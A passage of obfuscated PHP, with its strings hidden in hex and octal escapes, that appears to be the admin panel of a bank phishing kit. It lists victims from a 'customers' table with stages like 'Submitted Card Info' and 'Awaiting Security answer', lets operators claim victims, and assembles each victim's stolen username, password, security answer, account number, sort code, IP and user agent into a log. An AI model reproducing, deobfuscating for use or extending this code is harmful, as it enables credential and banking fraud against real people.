2f\x62\165\x74\164\157\x6e\x3e\xa\x9\11\11\11\x9\x9\11\x3c\x2f\x74\x64\76\12\11\x9\x9\11\x9\x9\74\57\164\x72\76\xa\11\x9\11\x9\x9\11"; } else { if ($value["\x6c\157\x67\137\157\x77\156\x65\x72"] == $_SESSION["\154\x6f\147\137\x6f\x77\156\x65\162"]) { echo "\xa\x9\x9\x9\11\x9\11\x3c\x74\162\x20\x73\x74\171\154\x65\75\x27\143\157\x6c\x6f\x72\x3a\x77\x68\x69\x74\145\x27\76\xa\11\11\x9\x9\x9\11\x9\74\164\144\76{$value["\151\x64"]}\74\x2f\x74\144\76\12\11\11\11\x9\x9\x9\x9\x3c\164\x64\76{$value["\x75\163\x72\x6c\x6f\x67\151\156"]}\74\57\164\144\76\xa\x9\11\x9\11\x9\x9\11\x3c\164\144\76{$userStatus}\74\x2f\164\144\x3e\12\11\11\11\x9\11\11\11\x3c\164\144\x3e{$value["\151\160"]}\x3c\57\164\144\76\xa\11\11\11\x9\x9\11\x9\74\164\144\x3e{$value["\143\x6f\x6d\155\x65\x6e\164"]}\74\57\164\144\76\xa\11\x9\x9\11\11\11\11\74\164\x64\76{$info}\x3c\57\x74\144\76\12\x9\11\11\11\11\11\x9\x3c\164\144\x3e\12\x9\11\x9\11\x9\11\x9\x9\x3c\x62\165\x74\x74\x6f\x6e\x20\x74\171\x70\x65\x3d\47\x62\x75\x74\164\x6f\156\x27\40\x6f\156\x63\x6c\151\143\153\x3d\x27\143\x6f\156\164\162\157\154\102\x74\156\50\164\150\151\x73\x29\x27\40\x63\154\141\x73\163\75\x27\142\x74\156\40\142\x74\x6e\x2d\155\x64\x20\x62\x74\156\55\x69\156\x66\157\47\40\x69\x64\75\47\165\x73\145\x72\151\144\x5f{$value["\151\144"]}\x27\40\144\x61\164\x61\x2d\x74\157\147\147\x6c\x65\x3d\47\x6d\157\144\x61\x6c\x27\x20\144\141\164\141\x2d\164\141\162\x67\145\x74\x3d\47\x23\155\157\144\x61\x6c\x5f\x75\163\x65\162\151\x64\x5f{$value["\x69\144"]}\x27\76\x41\143\x74\151\x6f\x6e\x3c\x2f\142\x75\164\x74\157\156\76\xa\x9\11\x9\11\x9\x9\x9\x9\x3c\142\x75\164\164\x6f\x6e\x20\164\171\160\x65\x3d\x27\x62\165\x74\x74\157\156\47\40\143\154\141\163\x73\75\47\142\164\x6e\40\x62\x74\156\55\x6d\144\x20\x62\164\x6e\x2d\144\141\x6e\147\145\162\x27\40\151\x64\x3d\x27\x75\163\145\x72\x69\x64\137{$value["\151\x64"]}\47\157\x6e\143\x6c\151\x63\153\x3d\47\x64\145\x6c\x65\164\x65\x65\x6e\x74\162\171\x28\x74\x68\151\163\51\x27\76\x3c\151\x20\143\154\141\x73\163\75\47\146\141\40\x66\141\55\x74\162\141\163\x68\x27\x20\141\162\151\x61\x2d\x68\x69\x64\x64\145\x6e\x3d\x27\164\162\x75\145\47\x3e\74\57\x69\x3e\x3c\57\142\165\x74\164\x6f\156\76\xa\11\11\11\11\x9\x9\x9\x3c\x2f\164\144\x3e\xa\x9\x9\11\11\x9\x9\74\57\x74\x72\76\12\x9\x9\x9\x9\11\11"; } else { echo "\12\x9\x9\x9\x9\x9\11\74\164\x72\40\x73\x74\x79\154\145\75\47\143\157\154\157\x72\72\167\150\x69\x74\x65\47\x3e\xa\11\x9\x9\x9\x9\11\x9\x3c\x74\144\76{$value["\151\144"]}\x3c\57\164\x64\76\xa\x9\11\x9\x9\x9\11\11\x3c\x74\144\x3e{$value["\x75\163\162\154\157\147\151\156"]}\74\x2f\164\x64\x3e\12\11\x9\11\11\11\x9\11\x3c\x74\x64\x3e{$userStatus}\x3c\57\x74\x64\76\12\x9\11\x9\x9\x9\11\11\x3c\164\144\x3e{$value["\x69\x70"]}\74\x2f\164\144\76\xa\11\11\x9\x9\x9\11\11\74\164\144\76{$value["\x63\157\x6d\x6d\x65\156\x74"]}\x3c\x2f\x74\144\x3e\xa\x9\11\11\11\11\11\11\x3c\x74\144\x3e{$info}\74\x2f\x74\144\x3e\12\x9\11\x9\11\x9\x9\x9\x3c\x74\x64\76\xa\11\x9\x9\11\x9\11\x9\x9\x3c\163\x70\141\x6e\x3e\103\x6c\141\x69\x6d\145\144\x20\x62\x79\40\x2d\40\x3c\151\x3e{$value["\154\x6f\147\x5f\x6f\167\156\x65\x72"]}\74\57\151\x3e\74\x2f\x73\x70\141\156\x3e\12\11\11\x9\x9\11\x9\11\x3c\57\164\x64\76\12\x9\x9\x9\11\11\11\x3c\57\164\x72\76\12\x9\11\x9\11\11\x9"; } } } } } } if (isset($_GET["\x66\145\x74\143\x68\x5f\x64\x61\x74\x61"])) { $query = mysqli_query($conn, "\123\x45\114\x45\x43\x54\x20\52\x20\146\162\x6f\155\40\x63\x75\163\x74\157\155\145\x72\x73\40\x4f\122\104\105\122\x20\102\x59\40\151\144\40\104\x45\123\103"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); } } foreach ($array as $value) { if ($value["\x73\x74\141\x74\x75\x73"] == 500) { $info = "\x3c\163\160\141\156\x20\143\154\x61\163\x73\x3d\42\142\x61\144\147\145\40\x62\141\x64\x67\x65\x2d\167\141\x72\x6e\x69\x6e\x67\42\76\105\141\x73\164\145\x72\40\145\147\x67\x3c\57\x73\160\x61\x6e\76"; } elseif ($value["\163\x74\x61\x74\x75\163"] == 1) { $info = "\74\163\160\141\x6e\40\x63\x6c\x61\x73\163\75\x22\142\141\144\147\145\40\142\141\144\147\x65\x2d\x69\x6e\146\x6f\42\76\x4e\x65\x77\40\125\x73\x65\x72\74\x2f\x73\160\141\x6e\x3e"; } elseif ($value["\x73\164\141\x74\x75\163"] == 2) { $info = "\x3c\163\160\x61\156\40\143\x6c\x61\x73\163\75\x22\142\141\144\x67\145\x20\x62\141\144\x67\145\x2d\160\x72\151\155\141\162\171\42\x3e\x53\165\x62\x6d\151\x74\x74\145\x64\40\x53\x65\143\165\162\151\x74\171\x20\141\x6e\163\167\145\162\74\x2f\x73\x70\x61\156\x3e"; } elseif ($value["\163\x74\x61\164\165\x73"] == 3) { $info = "\x3c\163\160\141\x6e\40\x63\x6c\141\x73\x73\x3d\x22\142\x61\x64\x67\x65\40\142\141\x64\147\145\x2d\x70\x72\151\155\x61\x72\x79\x22\x3e\123\x75\x62\155\151\164\164\x65\x64\40\x41\143\143\x6f\165\x6e\164\40\x49\156\146\157\74\x2f\x73\x70\x61\x6e\x3e"; } elseif ($value["\163\164\x61\x74\165\163"] == 4) { $info = "\74\163\160\x61\x6e\40\x63\154\x61\x73\x73\75\x22\x62\x61\x64\147\x65\x20\142\141\x64\x67\x65\55\160\162\x69\155\141\x72\x79\x22\x3e\x53\165\142\x6d\x69\164\164\x65\144\x20\x43\141\162\144\40\x49\156\146\x6f\x3c\57\x73\160\141\x6e\x3e"; } elseif ($value["\163\x74\141\x74\165\x73"] == 11) { $info = "\x3c\163\x70\x61\x6e\40\143\x6c\x61\x73\x73\75\x22\142\141\x64\x67\145\x20\x62\x61\x64\147\145\55\x70\162\x69\155\141\162\171\42\x3e\101\x77\141\x69\164\x69\x6e\x67\x20\x53\145\143\x75\x72\151\x74\x79\x20\141\156\x73\x77\x65\162\x3c\x2f\163\x70\141\156\x3e"; } elseif ($value["\163\x74\141\x74\165\x73"] == 12) { $info = "\x3c\x73\160\x61\156\x20\x63\x6c\141\163\x73\x3d\x22\142\x61\x64\x67\145\40\142\x61\144\147\x65\x2d\x70\162\151\155\141\162\171\42\76\x41\167\141\151\x74\x69\x6e\x67\40\101\x63\143\157\165\156\x74\x20\111\156\x66\x6f\74\x2f\x73\160\141\x6e\76"; } elseif ($value["\163\164\x61\x74\165\163"] == 50) { $info = "\74\163\x70\141\156\x20\143\154\x61\x73\x73\x3d\42\142\x61\144\147\145\40\142\x61\144\x67\x65\55\160\162\151\155\141\x72\171\x22\76\x42\141\143\x6b\40\x74\157\x20\154\157\x67\151\x6e\x3c\x2f\x73\160\x61\156\x3e"; } elseif ($value["\x73\x74\141\164\x75\163"] == 100) { $info = "\x3c\163\160\x61\x6e\40\x63\154\141\x73\x73\x3d\x22\x62\141\x64\147\145\x20\142\141\x64\147\145\55\160\162\151\155\x61\x72\171\42\76\x49\156\166\141\154\x69\x64\x3c\57\163\x70\141\156\x3e"; } elseif ($value["\x73\164\141\164\165\163"] == 20) { $info = "\74\x73\160\x61\156\40\x63\x6c\141\x73\163\75\42\x62\x61\x64\147\145\x20\x62\141\144\147\x65\55\x73\165\x63\143\145\x73\x73\x22\76\x46\151\156\x69\x73\150\145\144\74\x2f\163\x70\x61\x6e\76"; } if ($value["\163\x74\x61\x74\165\x73"] == 20) { $userStatus = "\x3c\163\160\141\156\76\74\x69\x6d\147\40\163\162\143\75\x22\160\141\x72\164\151\141\154\57\151\155\x67\x2f\x6f\x66\x66\56\160\156\147\42\40\163\x74\x79\x6c\x65\x3d\42\x77\151\x64\x74\x68\72\x32\x30\160\170\73\x70\x61\144\144\151\156\x67\55\162\151\x67\150\164\x3a\x31\160\170\42\x3e\74\x62\x3e\117\146\146\x6c\x69\156\145\x3c\x2f\x62\76\x3c\57\163\160\x61\x6e\x3e"; echo "\xa\x9\x9\x9\11\x3c\164\x72\40\x73\x74\x79\154\145\75\47\143\157\x6c\157\x72\x3a\x77\x68\x69\x74\x65\47\76\xa\x9\x9\11\x9\x9\x3c\164\x64\x3e{$value["\x69\144"]}\x3c\x2f\x74\x64\76\xa\11\11\11\11\11\74\164\x64\x3e{$value["\165\163\x72\154\x6f\x67\x69\156"]}\x3c\x2f\x74\144\x3e\xa\x9\x9\x9\11\11\x3c\164\x64\x3e{$userStatus}\x3c\57\x74\x64\76\12\11\11\11\x9\x9\74\164\x64\x3e{$value["\x69\x70"]}\74\57\164\x64\76\12\x9\x9\x9\11\x9\74\164\144\76{$info}\x3c\57\x74\x64\76\12\11\x9\x9\x9\11\x3c\x74\144\76\xa\x9\x9\x9\11\x9\11\74\x62\165\x74\164\x6f\x6e\x20\x74\x79\x70\145\x3d\47\142\165\x74\164\157\156\47\40\157\156\x63\154\151\143\x6b\75\47\166\151\145\x77\x5f\154\x6f\x67\x42\164\x6e\50\x74\150\x69\x73\x29\47\40\x63\154\141\163\x73\75\47\x62\164\156\x20\142\164\x6e\55\x6d\x64\x20\x62\x74\156\55\x64\x61\x72\153\47\40\x69\x64\75\47\165\x73\145\162\151\x64\x5f{$value["\x69\144"]}\x27\x20\144\141\x74\x61\55\164\x6f\147\x67\154\145\75\x27\x6d\157\x64\x61\154\47\x20\144\x61\164\x61\x2d\164\141\162\147\145\164\x3d\47\x23\x76\151\145\x77\x6d\157\x64\x61\154\x5f\x75\x73\x65\162\x69\144\137{$value["\151\144"]}\x27\x3e\126\x69\x65\167\40\x4c\x6f\147\x3c\x2f\x62\x75\x74\164\x6f\156\76\xa\11\11\x9\11\11\x9\x3c\142\x75\164\164\157\x6e\x20\x74\x79\x70\x65\x3d\47\142\x75\x74\164\157\156\x27\40\x63\x6c\x61\163\163\75\47\x62\x74\156\x20\x62\x74\x6e\x2d\155\144\40\x62\164\x6e\55\x64\x61\156\x67\145\x72\47\40\151\144\x3d\47\x75\x73\145\162\151\x64\x5f{$value["\151\144"]}\x27\157\156\143\x6c\151\x63\x6b\75\47\144\x65\154\x65\x74\x65\145\156\x74\162\171\50\x74\150\151\x73\51\x27\76\x3c\151\40\x63\x6c\141\x73\x73\75\47\146\x61\x20\146\141\x2d\164\x72\x61\x73\x68\x27\40\x61\x72\x69\141\55\x68\151\x64\144\x65\156\x3d\47\x74\x72\165\145\47\x3e\x3c\x2f\x69\x3e\x3c\x2f\142\165\164\x74\157\156\76\12\x9\11\11\x9\x9\x3c\x2f\164\144\x3e\xa\x9\x9\x9\11\x9\x3c\164\144\x3e\x46\x69\x6e\x69\163\150\x65\144\x20\142\x79\x20\x2d\x20{$value["\154\x6f\x67\137\x6f\x77\156\145\x72"]}\x3c\57\164\x64\76\12\x9\x9\x9\x9\74\x2f\164\x72\x3e\12\11\11\11\11"; } else { $userStatus = "\74\163\160\x61\156\76\x3c\x69\155\147\x20\163\162\143\75\x22\x70\141\162\164\151\x61\154\x2f\x69\x6d\147\57\x6f\x66\x66\x2e\x70\156\147\x22\40\163\x74\x79\154\145\75\x22\x77\x69\144\164\x68\x3a\62\x30\160\170\73\x70\x61\144\x64\x69\x6e\147\55\x72\x69\147\x68\164\x3a\x31\x70\x78\x22\x3e\x3c\142\76\117\x66\x66\x6c\x69\x6e\145\74\57\142\x3e\74\x2f\163\160\x61\156\76"; $savedStatus = $value["\154\x61\163\164\137\141\143\x74\x69\166\151\164\x79"]; if ($savedStatus !== null) { $user_main_status = new DateTime($savedStatus); $currentTime = new DateTime("\x6e\x6f\x77"); $indicator = $currentTime->getTimestamp() - $user_main_status->getTimestamp(); if ($indicator <= 8) { $userStatus = "\x3c\163\160\141\156\76\74\151\x6d\x67\40\x73\x72\x63\75\42\160\x61\x72\164\x69\141\x6c\57\x69\155\x67\57\157\156\x2e\160\x6e\x67\x22\x20\x73\164\171\154\145\x3d\x22\x77\151\x64\164\x68\x3a\62\60\160\170\x3b\160\141\144\x64\151\x6e\147\x2d\x72\x69\x67\150\164\72\61\x70\x78\42\76\74\142\76\117\156\x6c\151\x6e\145\74\57\x62\x3e\74\x2f\x73\160\141\x6e\76"; } } else { if ($savedStatus === null) { $userStatus = "\74\163\x70\141\x6e\76\x3c\151\x6d\x67\40\x73\x72\x63\x3d\x22\160\141\162\164\151\x61\154\x2f\x69\x6d\147\x2f\x6e\x61\56\160\156\x67\x22\x20\x73\x74\171\x6c\x65\x3d\x22\x77\151\144\x74\x68\x3a\x32\65\x70\x78\73\x70\141\144\144\x69\x6e\x67\55\x72\x69\147\150\164\x3a\61\160\x78\x22\x3e\x3c\x62\76\116\157\x20\144\141\164\141\x3c\57\142\76\74\x2f\163\x70\x61\156\x3e"; } } if ($Multiple_Admins == "\157\x66\146") { echo "\12\11\11\x9\x9\11\x3c\164\162\x20\163\x74\171\x6c\145\75\x27\x63\x6f\x6c\157\162\72\x77\x68\151\164\x65\x27\x3e\xa\x9\x9\11\11\11\x9\74\164\144\x3e{$value["\x69\144"]}\74\57\x74\x64\76\12\11\11\11\x9\x9\x9\x3c\x74\x64\x3e{$value["\165\x73\x72\154\157\147\151\x6e"]}\74\57\164\144\x3e\xa\11\11\x9\11\x9\11\74\164\144\76{$userStatus}\74\x2f\x74\144\x3e\12\x9\11\x9\11\11\x9\74\x74\x64\x3e{$info}\74\142\162\76{$value["\x63\157\x6d\155\145\156\x74"]}\x3c\57\164\144\x3e\12\x9\x9\x9\11\11\11\74\164\144\x3e\12\11\x9\x9\11\11\x9\11\74\x62\x75\x74\164\x6f\x6e\x20\x74\171\x70\x65\x3d\47\x62\165\x74\x74\x6f\x6e\x27\40\157\156\x63\154\x69\143\153\75\47\143\x6f\x6e\164\x72\x6f\x6c\102\x74\156\50\164\150\151\163\x29\47\40\x63\154\141\163\163\75\x27\x62\x74\x6e\x20\x62\x74\156\x2d\x6d\144\x20\142\164\156\55\151\x6e\146\157\47\40\151\x64\x3d\47\165\163\145\x72\x69\x64\137{$value["\151\144"]}\x27\40\144\141\x74\x61\x2d\x74\x6f\147\147\154\x65\75\x27\155\x6f\144\x61\x6c\47\40\144\141\x74\x61\x2d\164\x61\162\x67\145\164\75\x27\43\155\x6f\x64\141\154\x5f\165\163\x65\162\x69\144\x5f{$value["\151\144"]}\x27\x3e\101\x63\164\x69\157\x6e\74\x2f\142\165\x74\164\x6f\x6e\76\12\11\x9\11\x9\x9\x9\11\74\142\x75\164\164\157\x6e\x20\x74\171\x70\145\75\x27\142\x75\164\x74\x6f\x6e\47\40\x63\154\141\163\x73\x3d\x27\x62\164\x6e\x20\142\164\x6e\x2d\155\144\x20\x62\x74\x6e\55\144\x61\x6e\147\145\x72\47\x20\x69\144\x3d\x27\165\x73\145\162\x69\144\137{$value["\x69\x64"]}\47\157\156\x63\154\x69\143\x6b\x3d\47\144\x65\154\x65\164\145\x65\x6e\x74\x72\171\x28\x74\150\151\163\51\x27\76\74\151\40\x63\x6c\x61\x73\x73\75\47\x66\141\40\x66\x61\x2d\164\x72\141\x73\150\x27\40\141\x72\151\141\55\150\151\x64\x64\145\156\x3d\x27\164\162\165\x65\47\76\x3c\57\x69\x3e\74\57\142\x75\164\164\x6f\x6e\x3e\12\11\11\11\x9\11\11\74\57\x74\x64\x3e\xa\11\11\x9\11\11\74\57\164\x72\76\12\11\11\11\x9\11"; } else { if ($value["\154\x6f\x67\x5f\x6f\x77\x6e\x65\162"] == '') { echo "\12\11\x9\11\x9\11\x9\x3c\164\x72\40\163\x74\171\x6c\x65\x3d\47\x63\157\x6c\x6f\162\72\x77\150\151\164\x65\x27\76\xa\11\x9\11\11\x9\11\11\74\164\x64\76{$value["\151\x64"]}\74\57\x74\x64\76\xa\x9\11\x9\x9\x9\x9\11\74\x74\144\76{$value["\165\163\x72\154\157\x67\x69\x6e"]}\x3c\x2f\x74\144\x3e\xa\11\11\x9\11\11\x9\11\74\x74\144\76{$userStatus}\74\57\164\x64\x3e\xa\x9\11\11\x9\x9\11\x9\x3c\x74\x64\76{$info}\x3c\142\x72\x3e{$value["\x63\x6f\x6d\x6d\145\156\x74"]}\x3c\x2f\x74\x64\x3e\xa\x9\x9\x9\11\11\x9\x9\74\164\x64\x3e\xa\11\x9\x9\x9\11\11\11\11\x3c\142\x75\x74\x74\x6f\x6e\x20\164\x79\x70\145\x3d\x27\x62\165\164\164\157\x6e\x27\x20\x6f\x6e\x63\154\x69\x63\153\75\x27\143\154\141\x69\x6d\102\164\156\50\164\x68\151\x73\51\47\x20\143\154\141\163\x73\75\47\x62\x74\156\x20\142\164\156\55\x6d\144\x20\142\x74\x6e\55\151\x6e\x66\157\47\x20\151\144\x3d\x27\165\163\x65\162\x69\144\x5f{$value["\151\144"]}\x27\x20\144\141\x74\141\x2d\x74\x6f\x67\x67\154\x65\75\47\x6d\x6f\x64\141\x6c\47\x20\144\141\x74\141\x2d\x74\141\x72\147\x65\x74\x3d\47\x23\x6d\157\144\141\154\x5f\165\x73\x65\162\151\x64\x5f{$value["\151\144"]}\47\76\40\103\154\141\151\155\x20\114\157\147\x20\360\237\x94\x91\74\57\x62\165\164\164\x6f\x6e\x3e\xa\x9\11\x9\11\11\x9\x9\x3c\57\164\144\76\12\11\11\11\x9\11\11\x3c\57\x74\x72\x3e\12\11\x9\11\11\x9\x9"; } else { if ($value["\x6c\157\x67\137\157\x77\x6e\145\x72"] == $_SESSION["\154\x6f\x67\137\x6f\167\156\145\x72"]) { echo "\12\11\11\x9\x9\x9\11\74\164\162\40\x73\x74\x79\154\145\x3d\47\x63\157\x6c\x6f\162\72\167\x68\x69\x74\x65\47\x3e\12\11\11\11\11\x9\x9\x9\74\x74\x64\x3e{$value["\151\x64"]}\74\57\x74\x64\76\12\x9\11\x9\11\x9\11\x9\x3c\x74\144\x3e{$value["\x75\163\x72\154\x6f\x67\151\x6e"]}\x3c\57\x74\x64\x3e\12\x9\x9\11\11\11\x9\11\74\x74\x64\x3e{$userStatus}\74\57\x74\x64\x3e\xa\11\11\11\x9\11\x9\x9\74\164\x64\76{$info}\74\x62\162\x3e{$value["\x63\157\155\x6d\x65\x6e\164"]}\74\57\x74\x64\x3e\xa\x9\x9\11\x9\x9\x9\11\74\x74\144\76{$info}\x3c\57\x74\144\76\12\11\x9\11\x9\11\11\11\74\x74\x64\x3e\xa\11\x9\11\x9\11\11\x9\x9\74\x62\165\164\164\x6f\x6e\x20\164\171\x70\x65\75\47\x62\165\x74\164\157\x6e\x27\40\157\156\143\x6c\151\143\153\75\47\143\157\156\164\162\157\x6c\102\x74\x6e\x28\x74\x68\x69\163\x29\x27\40\x63\154\141\163\163\75\x27\x62\x74\156\40\142\x74\x6e\x2d\155\x64\40\142\x74\x6e\x2d\x69\x6e\146\157\47\40\x69\x64\x3d\x27\x75\x73\145\162\151\144\137{$value["\x69\144"]}\x27\x20\144\141\164\141\55\164\157\x67\147\x6c\x65\x3d\x27\x6d\x6f\x64\141\x6c\x27\x20\144\x61\164\141\55\x74\141\x72\x67\145\164\75\47\x23\155\x6f\x64\x61\x6c\x5f\165\163\x65\x72\151\144\x5f{$value["\151\x64"]}\x27\x3e\101\x63\x74\x69\x6f\x6e\x3c\57\x62\x75\x74\x74\157\x6e\x3e\12\11\x9\x9\11\x9\x9\x9\x9\74\x62\165\x74\x74\157\x6e\x20\164\x79\160\x65\75\x27\142\165\164\x74\x6f\x6e\x27\x20\143\x6c\x61\163\163\x3d\x27\x62\x74\156\x20\x62\164\x6e\x2d\155\x64\40\x62\x74\x6e\x2d\x64\141\156\147\145\162\47\40\x69\x64\x3d\x27\165\163\x65\162\151\x64\137{$value["\151\x64"]}\x27\157\x6e\143\x6c\x69\143\x6b\x3d\x27\144\x65\x6c\145\x74\145\145\156\x74\162\171\50\x74\150\151\x73\x29\x27\76\74\151\x20\x63\x6c\x61\163\x73\x3d\x27\x66\141\x20\146\x61\x2d\164\x72\141\163\x68\47\40\141\162\x69\141\55\x68\x69\x64\x64\145\156\x3d\x27\x74\x72\165\x65\47\x3e\74\x2f\x69\76\74\x2f\142\x75\164\164\x6f\156\76\xa\x9\x9\11\x9\x9\11\11\74\57\x74\x64\76\xa\11\x9\x9\11\x9\11\x3c\x2f\164\x72\x3e\12\11\11\x9\11\x9\x9"; } else { echo "\xa\x9\x9\11\x9\11\11\x3c\x74\162\40\x73\164\171\154\145\x3d\x27\x63\157\x6c\157\x72\x3a\x77\x68\151\x74\145\x27\x3e\xa\x9\11\x9\11\x9\11\11\x3c\x74\x64\x3e{$value["\151\144"]}\74\x2f\164\x64\x3e\12\x9\11\x9\11\11\x9\11\74\x74\x64\76{$value["\165\163\x72\154\x6f\x67\x69\156"]}\x3c\57\x74\144\x3e\xa\11\x9\11\11\11\11\x9\x3c\164\144\76{$userStatus}\x3c\x2f\164\144\x3e\12\11\x9\x9\x9\11\11\x9\74\x74\x64\x3e{$info}\x3c\x62\162\x3e{$value["\143\x6f\155\155\x65\x6e\164"]}\74\x2f\164\144\x3e\xa\11\x9\11\x9\x9\x9\x9\x3c\164\x64\76\12\x9\11\11\x9\x9\x9\x9\x9\x3c\x73\x70\x61\156\76\103\x6c\x61\x69\x6d\x65\144\40\x62\171\x20\55\40\x3c\x69\x3e{$value["\x6c\x6f\x67\137\157\x77\x6e\x65\162"]}\x3c\x2f\x69\76\74\x2f\x73\x70\141\x6e\x3e\12\11\11\x9\x9\x9\11\11\x3c\57\x74\144\x3e\12\11\x9\x9\x9\11\x9\x3c\57\x74\x72\x3e\12\x9\11\x9\11\x9\x9"; } } } } } } if (isset($_GET["\143\154\141\x69\x6d\x5f\x64\x61\164\x61"])) { if ($_POST["\165\x73\145\162\151\144"] and numeric($_POST["\165\163\x65\x72\x69\144"]) == true) { $userid = $_POST["\165\163\x65\162\x69\x64"]; $log_owner = $_SESSION["\x6c\x6f\147\x5f\x6f\x77\156\145\x72"]; $query = mysqli_query($conn, "\125\120\104\x41\124\105\x20\x63\x75\x73\164\x6f\155\x65\162\x73\40\x53\x45\x54\x20\x6c\157\147\137\x6f\167\x6e\x65\x72\x3d\x27{$log_owner}\47\x2c\x20\142\165\172\172\145\x64\x3d\61\x20\x57\110\105\x52\105\x20\151\144\x3d{$userid}"); if ($query) { echo json_encode(array("\x73\164\141\x74\x75\x73" => "\x6f\x6b")); } else { echo json_encode(array("\163\x74\x61\164\x75\163" => "\x6e\x6f\164\x6f\153")); } } else { echo json_encode(array("\x73\164\x61\x74\x75\x73" => "\156\157\x74\x6f\153\x6b")); } } if (isset($_GET["\146\x65\x74\143\150\137\x70\143\137\x6d\157\144\x61\154\x5f\x64\141\164\x61"])) { $query = mysqli_query($conn, "\x53\x45\114\x45\x43\x54\40\x2a\x20\146\162\x6f\x6d\x20\x63\x75\163\164\x6f\155\x65\x72\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\165\163\x72\x6c\x6f\147\151\156"]; $usrpass = $value["\165\163\162\160\141\x73\163"]; $secans = $value["\163\x65\x63\141\x6e\163"]; $secque = $value["\163\145\143\161\165\145"]; $acct = $value["\141\143\143\164"]; $sort = $value["\x73\157\162\164"]; $ip = $value["\x69\160"]; $useragent = urldecode($value["\165\x73\145\162\141\x67\x65\x6e\164"]); $data_log = "\xa\x3d\75\75\x3d\x3d\342\x89\253\x20\x4c\x6f\147\151\156\40\342\211\252\x3d\75\x3d\x3d\x3d\xa\x55\163\x65\162\x20\x49\104\40\x3a\x20{$usrlogin}\12\x50\x61\163\x73\x20\72\40{$usrpass}\12\x3d\75\x3d\75\x3d\342\211\253\40\123\145\x63\165\162\x69\164\171\x20\342\x89\252\75\75\75\x3d\75\12\123\x65\x63\x75\162\151\x74\171\40\101\156\x73\x77\x65\x72\72\x20{$secque}\12\123\x65\x63\165\162\151\164\x79\40\101\x6e\163\x77\x65\162\72\x20{$secans}\12\75\75\x3d\x3d\75\xe2\x89\253\40\101\x63\143\157\165\156\164\x20\xe2\211\252\x3d\75\75\x3d\75\xa\x41\143\x63\157\x75\156\164\40\116\x6f\x2e\x20\x3a\x20{$acct}\xa\x53\x6f\x72\164\40\x63\157\x64\x65\x20\72\x20{$sort}\12\75\75\75\75\75\x3d\75\75\75\75\x3d\75\x3d\x3d\x3d\x3d\75\75\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\x3d\75\12\111\120\x20\72\x20{$ip}\12\125\101\x20\x3a\40{$useragent}\12\75\x3d\75\75\75\x3d\75\75\x3d\75\75\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\x3d\75\75\x3d\75\75\x3d\75\75"; echo "\12\11\12\11\x9\x9\x3c\144\x69\166\x20\x63\154\141\x73\x73\75\x27\x6d\x6f\x64\x61\x6c\x20\x66\x61\x64\x65\47\x20\x69\x64\75\x27\155\157\144\141\154\x5f\165\163\x65\x72\151\144\x5f{$value["\151\x64"]}\47\x20\164\x61\142\x69\x6e\144\x65\170\x3d\x27\55\61\x27\40\162\x6f\154\x65\x3d\x27\144\151\x61\x6c\x6f\147\x27\x20\141\x72\151\x61\x2d\154\141\x62\x65\154\x6c\145\144\x62\171\x3d\47\x65\170\x61\x6d\160\x6c\x65\x4d\157\144\141\x6c\114\141\x62\145\x6c\47\x20\141\162\x69\x61\55\150\x69\144\144\x65\x6e\x3d\x27\x74\x72\x75\x65\x27\x20\x73\x74\x79\x6c\145\75\x27\157\160\141\x63\x69\x74\171\x3a\61\x20\x21\x69\x6d\x70\x6f\x72\x74\141\156\x74\73\x64\151\x73\x70\x6c\x61\171\72\x6e\157\156\x65\x3b\x68\145\x69\147\x68\x74\x3a\x31\60\x30\x25\73\157\x76\x65\x72\x66\154\157\x77\x3a\163\x63\x72\157\x6c\154\73\47\x3e\12\x9\x9\11\11\x3c\x66\157\162\x6d\40\156\x61\x6d\145\x3d\x27\x63\157\156\x66\x69\147\137\x66\x6f\x72\x6d\137{$value["\151\144"]}\47\x20\x69\144\x3d\47\143\157\156\146\x69\147\x5f\x66\157\162\155\x5f{$value["\x69\x64"]}\x27\x20\155\x65\164\x68\x6f\144\x3d\47\120\117\x53\124\x27\40\x61\143\x74\x69\x6f\156\75\x27\47\40\156\x6f\x76\141\x6c\x69\x64\141\164\145\x3e\xa\x9\x9\x9\x9\x9\x3c\x69\x6e\x70\165\x74\40\164\x79\160\x65\75\47\150\151\x64\144\145\156\47\40\x6e\141\x6d\x65\x3d\47\x75\163\145\x72\151\144\x27\x20\166\141\x6c\165\145\x3d\x27{$value["\x69\x64"]}\47\76\12\11\x9\11\11\x9\74\x64\x69\x76\x20\x63\x6c\x61\x73\163\x3d\47\x6d\157\x64\x61\x6c\55\x64\151\141\154\157\147\47\x20\x72\x6f\x6c\145\x3d\47\x64\x6f\143\165\155\x65\156\x74\x27\40\x73\164\x79\154\x65\x3d\x27\167\151\144\x74\150\72\65\60\60\160\170\47\x3e\12\11\11\x9\x9\x9\x9\x3c\144\151\166\x20\x63\154\141\x73\163\75\47\x6d\x6f\x64\x61\x6c\55\143\x6f\x6e\164\x65\x6e\x74\47\40\163\x74\x79\154\x65\75\x27\142\141\x63\x6b\x67\x72\157\165\156\144\55\143\157\154\157\x72\x3a\40\x62\154\141\143\x6b\x3b\47\x3e\12\x9\x9\x9\x9\x9\11\x9\74\x64\151\166\40\x63\154\x61\x73\x73\x3d\47\155\157\144\141\154\55\150\145\141\x64\x65\162\x27\x20\163\x74\x79\x6c\x65\x3d\x27\142\x61\x63\153\x67\162\x6f\165\x6e\x64\x2d\x63\x6f\x6c\x6f\x72\x3a\43\x33\x34\x34\x39\x35\105\73\146\157\156\164\55\x73\151\172\145\72\62\56\x37\x72\145\155\x3b\x74\145\170\x74\x2d\x61\x6c\151\147\156\x3a\x63\x65\x6e\x74\x65\x72\73\x27\x3e\xa\11\x9\11\x9\11\11\11\x9\x3c\x68\x35\x20\x63\154\x61\x73\x73\75\x27\x6d\157\x64\x61\154\55\x74\151\164\154\x65\47\x20\x69\144\x3d\47\x65\x78\141\155\x70\x6c\145\115\157\x64\x61\x6c\x4c\141\142\x65\154\47\40\x73\164\171\154\x65\75\x27\x63\157\154\157\162\72\x77\150\x69\164\x65\x27\x3e\x41\144\155\151\156\40\x43\157\156\164\x72\x6f\x6c\74\57\150\x35\76\12\x9\x9\11\x9\11\11\11\11\74\142\x75\164\x74\x6f\156\x20\164\171\160\145\x3d\x27\142\x75\164\164\x6f\x6e\x27\40\143\154\141\x7